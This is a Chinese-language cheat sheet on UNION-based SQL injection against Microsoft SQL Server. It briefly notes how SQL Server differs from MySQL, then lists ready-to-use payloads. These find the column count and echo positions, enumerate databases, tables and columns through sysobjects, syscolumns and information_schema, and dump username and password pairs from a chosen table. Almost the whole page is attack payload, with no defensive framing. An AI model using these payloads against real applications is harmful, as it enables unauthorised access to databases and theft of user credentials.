sqlserver联合注入

联合注入

介绍
SQLServer 的联合注入和 MySQL 的区别很大。
特点

SQLServer 是强数据类型，判断回显位时先使用 null 占位，再依次用字符串替换
SQLServer 中没有limit 语句，可以使用 top 代替或者 STRING_AGG（sql server 2017 新增）
SQLServer 没有 group_concat()函数，想要一次性获取数据可以使用for xml path或者for json auto

常用语句

判断列数

order by 4--+

找回显位

union select '1',null,null,null --+ 
union all select '1',null,null,null --+ 

查当前数据库名

union select null,db_name(),null,null--+ 

获取全部数据库名

union select null,(select top 1 name from master..sysdatabases for xml path),null,null--+ 
union select null,(select top 1 name from sys.databases),null,null--+ 

查表名

union select null,(select top 1 table_name from information_schema.tables WHERE table_type = 'BASE TABLE'),null,null --+ 
union select null,(select top 1 name from sysobjects where xtype='u'),null,null--+ 
union select null,(select top 1 name from sysobjects where xtype='u' and name not in ('第一个表名')),null,null--+ 
union select null,(select top 1 name from 数据库名.dbo.sysobjects where xtype='u'),null,null--+ 
union select null,(select top 1 name from 数据库名.dbo.sysobjects where xtype='u' and name not in ('第一个表名')),null,null--+ 
union select null,(select top 1 name from sys.objects where type='u'),null,null--+ 

获取全部表名

union select null,(select table_name from information_schema.tables WHERE table_type = 'BASE TABLE' for xml path),null,null --+ 
union select null,(select name from sysobjects where xtype='u' for xml path),null,null--+ 
union select null,(select name from 数据库名.dbo.sysobjects where xtype='u' for xml path),null,null--+ 
union select null,(select name from sys.objects where type='u' for xml path),null,null--+ 

查列名

union select null,(select top 1 column_name from information_schema.columns where table_name='表名'),null,null--+ 
union select null,(select top 1 col_name(object_id('表名'),1)),null,null--+ union select null,(select top 1 col_name(object_id('表名'),第几列)),null,null--+ 
union select null,(select top 1 name from syscolumns where id=object_id('表名')),null,null--+ 
union select null,(select top 1 name from syscolumns where id=object_id('表名') and name not in (列名)),null,null--+ 
union select null,(select top 1 name from sys.columns where object_id=object_id('表名')),null,null--+ 

查全部列名

union select null,(select column_name from information_schema.columns where table_name='表名' for xml path),null,null--+ 
union select null,(select name from syscolumns where id=object_id('表名') for xml path),null,null--+ 
union select null,(select name from sys.columns where object_id=object_id('表名') for xml path),null,null--+ 

查数据

union select null,(select top 1 concat(username,0x7e,password) from 表名),null,null --+ 
union select null,(select username from 表名 for xml path),null,null --+